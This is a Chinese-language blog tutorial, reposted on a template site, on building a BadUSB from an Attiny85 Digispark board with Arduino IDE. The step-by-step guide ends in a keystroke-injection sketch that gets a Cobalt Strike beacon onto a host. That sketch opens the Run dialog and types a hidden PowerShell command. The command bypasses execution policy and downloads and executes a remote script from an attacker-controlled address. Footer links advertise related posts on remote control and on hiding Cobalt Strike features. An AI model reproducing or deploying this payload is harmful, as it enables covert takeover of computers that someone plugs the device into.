BadUSB超详细制作, 实现CobaltStrike远控上线

这篇具有很好参考价值的文章主要介绍了BadUSB超详细制作, 实现CobaltStrike远控上线。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

前言

在2014年美国黑帽大会上,安全研究人员JakobLell和独立安全研究人员Karsten Nohl展示了他们称为“BadUSB”的攻击方法,这种攻击方法让USB安全和几乎所有和USB相关的设备(包括具有USB端口的电脑)都陷入相当危险的状态

现在的USB设备很多,比如语音视频设备、摄像头等,因此要求系统提供最大的兼容性,甚至免驱;所以在设计USB标准的时候没有要求每个USB设备像网络设备那样占有一个唯一可识别的MAC地址让系统进行验证,而是允许一个USB设备具有多个输入输出设备的特征。这样就可以通过重写U盘固件,伪装成一个USB键盘,并通过虚拟键盘输入集成到U盘固件中的指令和代码而进行攻击


什么是Badusb

BadUSB是利用了USB协议上的漏洞,通过更改USB的内部固件,在正常的USB接口接入后,模拟外置鼠标、键盘的功能,以此来使目标主机执行已经精心构造好的命令。在此过程中不会引起杀毒软件、防火墙的一丝怀疑。而且因为是在固件级别的应用,U盘格式化根本无法阻止其内部代码的执行


准备步骤

1.设备选择

制作badusb的几种常见载体有:Arduino Leonardo、Phison、Teensy、Attiny85、PS2303(芯片)、RUBBER DUCKY等。

从专业程度和易用性来讲RUBBER DUCKY最优, 本篇文章选择基于Attiny85的设备, 淘宝上价格在12~20左右, 性价比相对来说比较高


2.Arduino IDE的安装

Arduino开发者工具Arduino IDE的下载地址: https://www.arduino.cc/en/software, 选择下载Windows ZIP file文件即可

首次打开Arduino IDE, 会自动联网下载软件包并安装

BadUSB超详细制作, 实现CobaltStrike远控上线


3.驱动安装

开发板驱动程序下载地址: https://github.com/digistump/DigistumpArduino/releases/download/1.6.7/Digistump.Drivers.zip

下载完后解压文件, 然后运行DPinst64.exeInstall Drivers.exe

BadUSB超详细制作, 实现CobaltStrike远控上线


4.配置Digispark环境

方法一

若你的外网连接速度够快, 那么可直接点击首选项, 然后在其他开发板管理器地址输入http://digistump.co/package_digistump_index.json

BadUSB超详细制作, 实现CobaltStrike远控上线


方法二

由于开发板管理器的下载模块是通过网站进行下载的, 若访问github的网速不够快就会报错, 但我们自行搭建本地服务器, 将json文件和其他压缩文件一起放到本地服务器上, 此处我选择用phpstudy搭建服务器, 首先启动phpstudy

BadUSB超详细制作, 实现CobaltStrike远控上线


开启外网代理, 访问https://raw.githubusercontent.com/ArminJo/DigistumpArduino/master/package_digistump_index.json, 复制json文件内容至1.json中

BadUSB超详细制作, 实现CobaltStrike远控上线


下载压缩包: https://github.com/ArminJo/DigistumpArduino, 解压后将digistump-avr-1.7.5.ziptools/micronucleus-cli-2.6-x86_64-mingw32.zip复制到本地服务器中, 也把1.json复制到本地服务器上

BadUSB超详细制作, 实现CobaltStrike远控上线

修改1.json文件内容, 将url字段的值修改为对应的本地服务器文件地址

BadUSB超详细制作, 实现CobaltStrike远控上线

BadUSB超详细制作, 实现CobaltStrike远控上线


在首选项处的其他开发管理器地址填写成: http://127.0.0.1:81/1.json

BadUSB超详细制作, 实现CobaltStrike远控上线


5.安装Digispark开发板

点击工具->开发板->开发板管理器, 然后在左边的侧栏找到Digistump进行安装

BadUSB超详细制作, 实现CobaltStrike远控上线

BadUSB超详细制作, 实现CobaltStrike远控上线


选择对应的开发板型号,配置完成

BadUSB超详细制作, 实现CobaltStrike远控上线


烧录基本流程

1.验证代码

这段代码包含了一个名为 setup() 的函数和一个名为 loop() 的函数。

setup() 函数中包含了一些指令,它们会在程序运行时首先被执行。

#include "DigiKeyboard.h"

void setup() {
DigiKeyboard.sendKeyStroke(0); //发送一个按键,用于清空当前的输入

DigiKeyboard.delay(3000);   //延迟三秒钟
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);  //发送一个按键,用于打开运行对话框
DigiKeyboard.delay(1000);
DigiKeyboard.println("notepad"); //向运行对话框输入notepad打开记事本
DigiKeyboard.sendKeyStroke(KEY_ENTER);  //发送一个回车键
DigiKeyboard.delay(4000);
DigiKeyboard.println("Hellow");  //向打开的记事本窗口输入"Hello"
}

void loop() {

}

点击右上角的勾号对代码进行验证

BadUSB超详细制作, 实现CobaltStrike远控上线


2.上传代码

点击箭头上传代码, 随后在命令行界面会显示"Please plug in the device(will time out in 60 seconds)", 意思是在60秒内插入我们的badusb设备

BadUSB超详细制作, 实现CobaltStrike远控上线

BadUSB超详细制作, 实现CobaltStrike远控上线


插入badusb后开始烧录

BadUSB超详细制作, 实现CobaltStrike远控上线


3.验证效果

插入badusb后会自动打开一个记事本, 然后在记事本上输入Hellow

BadUSB超详细制作, 实现CobaltStrike远控上线


CobaltStrike远控上线

Ardunio代码

这段代码包含了一些头文件的引用和宏定义,接下来是两个函数:setup()和loop()。

#include "DigiKeyboard.h"
#define KEY_ESC     41
#define KEY_BACKSPACE 42
#define KEY_TAB     43
#define KEY_PRT_SCR 70
#define KEY_DELETE  76
 
void setup() {
 
DigiKeyboard.delay(5000); //延迟5秒
DigiKeyboard.sendKeyStroke(0);  发送一个按键,用于清空当前的输入
DigiKeyboard.delay(3000);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT); //发送一个按键,用于打开运行对话框
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("powershell -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://192.168.47.155:80/a');"));  //向运行对话框输入PowerShell代码远程执行CS上线指令
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);  //发送一个回车键
DigiKeyboard.delay(750);
DigiKeyboard.sendKeyStroke(KEY_ENTER); 
 
}
void loop() {
}

执行效果

BadUSB超详细制作, 实现CobaltStrike远控上线


注意事项

  • 在进行烧录操作时要关闭虚拟机(因为badusb设备会被虚拟机优先识别判断), 不然Arduino IDE无法进行烧录
  • 若要在虚拟机测试badusb的功能, 需要在其首选项设置优先识别badusb设备

文章来源地址https://www.toymoban.com/news/detail-458116.html

到了这里,关于BadUSB超详细制作, 实现CobaltStrike远控上线的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • MSF+FRP实现内网穿透进行远控

    禁止利用该教程做违法的事情 攻击机:kali:192.168.26.128 实体机: win11 进入创建隧道的官网:https://www.openfrp.net/ 需要注册一下并实名(不需要人脸验证),这里默认你注册好了 点击创建隧道,并选择一个多线隧道,尽量不要选满载的,这里我选广州多线(一定要是多线!!!推

    2024年02月15日
    浏览(43)
  • 任务15、MidJourney视频(Video)参数动态上线,制作惊艳动画短片

    本次任务将帮助你掌握Midjourney中的Video参数,并利用这些参数创作出令人惊艳的绘画作品。通过学习Video参数的基本概念和功能,以及案例的实际应用,你将学会如何正确设置和调整这些参数,从而达到你所期望的绘画效果。最终,你将运用所学知识,生成香奈儿模特的镜头

    2024年02月13日
    浏览(51)
  • vue实现标签页切换/制作tab组件【详细】

    在vue中实现标签页切换有如下2种方式: ① 使用动态组件 ② 使用路由 当然你可以使用第三方ui来实现,比如Element Plus。不过自己试着实现一下会更好。 这里讲一下第一和第二种方式,以组件实现为重点,那么就先讲一下使用路由的方式。 使用路由实现 Tab切换 首先,在rou

    2024年02月14日
    浏览(55)
  • AI绘画软件数画上线真人元宇宙ai虚拟头像,制作教程来了

    尊敬的用户: 是不是破不急待了,那就马上体验一下新模型“元宇宙AI虚拟头象”把自已变成元宇宙中的人物吧。 操作很简单哦,只需三步。 打开相册上传头像或直接点击相机自拍创作 选择虚拟头像模型 点击创作就可以啦 如果对头像不满意可多创作几次。每次都会有惊喜

    2024年02月13日
    浏览(38)
  • 每周AI大事件 百度文心一言上线搜索、文生视频、图表制作等5大插件

    每周AI大事件 | 百度文心一言上线搜索、文生视频、图表制作等5大插件 最近的8月12日,新华社研究院中国企业发展研究中心发布了一份十分有趣的报告——《人工智能大模型体验报告2.0》。在报告中,他们精心挑选了8种大模型产品进行深度评测,涉及360智脑、百度文心一言

    2024年02月11日
    浏览(35)
  • 前后端项目部署上线详细笔记

    参考文章: 如何部署网站?来比比谁的方法多 - 哔哩哔哩 大家好,我是鱼皮,不知道朋友们有没有试着部署过自己开发的网站呢?其实部署网站非常简单,而且有非常多的花样。这篇文章就给大家分享几种主流的前端 / 后端项目部署方式吧!前端部署对于前端项目,打包之

    2024年02月10日
    浏览(41)
  • CobaltStrike搭建--多人协作

    在团队(服务端)启动服务遇到两个报错 https://www.oracle.com/java/technologies/downloads/#java18 rpm -ivh jdk–xx(直接Tab即可)

    2024年02月13日
    浏览(74)
  • 渗透测试神器-CobaltStrike

    注意:仅用于本人学习的笔记记录,禁止进行传播分享,一旦造成严重后果与本人无关!!! 一、CobaltStrike工具的介绍、安装 不建议在本机运行 后渗透:获得了一定权限之后进行渗透(webshell) 团队作战的工具 共享!! CS拿到A主机的权限,你的成员都可以去控制A主机 cs基

    2024年02月06日
    浏览(44)
  • CobaltStrike基础使用详解

    CobaltStrike简介 Cobalt Strike(简称为CS)是一款团队作战渗透测试神器,是一种可以用来进行横 向移动、数据窃取、鱼叉式钓鱼的后渗透工具,分为客户端和服务端,一个客户端可 以连接多个服务端,一个服务端也可以对应多个客户端连接。 CobaltStrike基本使用 CS安装 1.Linux安装

    2024年02月12日
    浏览(42)
  • cs(cobaltstrike)隐藏特征

    一,禁止ping动作 命令: vim /etc/sysctl.conf #打开文件编辑 添加一行: net.ipv4.icmp_echo_ignore_all = 1 保存刷新: sysctl -p 二,特征端口号更改 编辑: teamserver #直接编辑cs内这个文件,修改host 三,修改cs默认证书 -keystore 生成的store名 -storepass 指定更改密钥库的存储口令 -keypass 指定更

    2024年03月11日
    浏览(43)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包